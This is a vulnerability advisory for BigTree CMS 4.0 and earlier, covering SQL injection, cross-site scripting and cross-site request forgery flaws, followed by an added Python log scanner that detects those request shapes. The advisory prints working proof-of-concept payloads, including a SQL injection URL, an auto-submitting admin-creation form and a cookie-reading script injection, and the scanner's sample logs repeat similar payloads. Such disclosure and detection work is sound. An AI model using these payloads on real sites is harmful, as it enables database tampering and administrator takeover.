CVSS2: 7.5 High
Access Vector: NETWORK; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 0.004 Low (percentile 72.1%)
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in the application's database and gain complete control over the application.
SQL Injection in BigTree CMS: CVE-2013-4879
The vulnerability exists due to insufficient sanitisation of user-supplied data passed to the "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.
The following PoC (Proof of Concept) code displays the version of the MySQL server:
http://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
The SQL injection vulnerability was independently discovered by the vendor shortly before High-Tech Bridge Security Research Lab.
Cross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881
The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.
The basic CSRF exploit below will create a new administrator "attacker" with password "password":
<form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="level" value="1">
<input type="hidden" name="name" value="attacker">
<input type="hidden" name="company" value="company">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880
The vulnerability exists due to insufficient filtering of user-supplied data in the "module" HTTP GET parameter passed to the "/site/index.php/admin/developer/modules/views/add/" URL. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display the administrator's cookies:
http://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl
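A defender-side check covering the three request shapes this advisory describes (SQL fragments in the path info of /site/index.php, markup in the "module" parameter of the views/add URL, and admin user-creation POSTs whose Referer is not the site itself), written as an added example and not part of the advisory or of BigTree CMS. It runs over constructed combined-format access-log lines and assumes the site's own hostname is cms.example; the Referer comparison is a detection heuristic, not a replacement for the CSRF token check the application lacks.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed sample access-log lines (combined format); not taken from the advisory.
SAMPLE_LOG = r'''
10.0.0.7 - - [01/Aug/2013:10:00:01 +0000] "GET /site/index.php/%27%20and%20%28select%201%29%3D1%20and%20%27 HTTP/1.1" 500 128 "-" "curl/7.30"
10.0.0.9 - - [01/Aug/2013:10:00:02 +0000] "GET /site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3E1%3C/script%3E&table=1&title=x HTTP/1.1" 200 2048 "http://evil.example/" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2013:10:00:03 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://evil.example/csrf.html" "Mozilla/5.0"
10.0.0.2 - - [01/Aug/2013:10:00:04 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://cms.example/site/index.php/admin/users/add/" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# SQL fragments that never belong in path info: quote-and-boolean, SELECT...FROM, schema probing.
SQLI_RE = re.compile(r"'\s*(and|or)\b|\bselect\b.+\bfrom\b|information_schema", re.I)
# Markup metacharacters in a value the add-view template should treat as plain text.
XSS_RE = re.compile(r'[<>"\']|javascript:', re.I)

def classify(req, site_host):
    """Label one parsed request (LOG_RE groupdict) or return None if benign."""
    parts = urlsplit(req["target"])
    path = unquote(parts.path)        # decode once, as the PHP router does
    query = parse_qs(parts.query)     # parse_qs percent-decodes values too
    # CVE-2013-4879: path info after /site/index.php/ reaches the SQL layer.
    if path.startswith("/site/index.php/"):
        if SQLI_RE.search(path[len("/site/index.php/"):]):
            return "sqli"
    # CVE-2013-4880: 'module' on the views/add URL is reflected without escaping.
    if "/admin/developer/modules/views/add" in path:
        if any(XSS_RE.search(v) for v in query.get("module", [])):
            return "xss"
    # CVE-2013-4881: admin user-creation POST whose Referer is not our own host (heuristic only).
    if req["method"] == "POST" and "/admin/users/create" in path:
        ref_host = urlsplit(req["referer"]).hostname if req["referer"] != "-" else None
        if ref_host != site_host:
            return "csrf"
    return None

def scan_log(text, site_host):
    """Return (client_ip, label) for every log line that triggers a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            label = classify(m.groupdict(), site_host)
            if label:
                hits.append((m["ip"], label))
    return hits
```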
CPE | Name | Operator | Version
---|---|---|---
 | bigtree cms | le | 4.0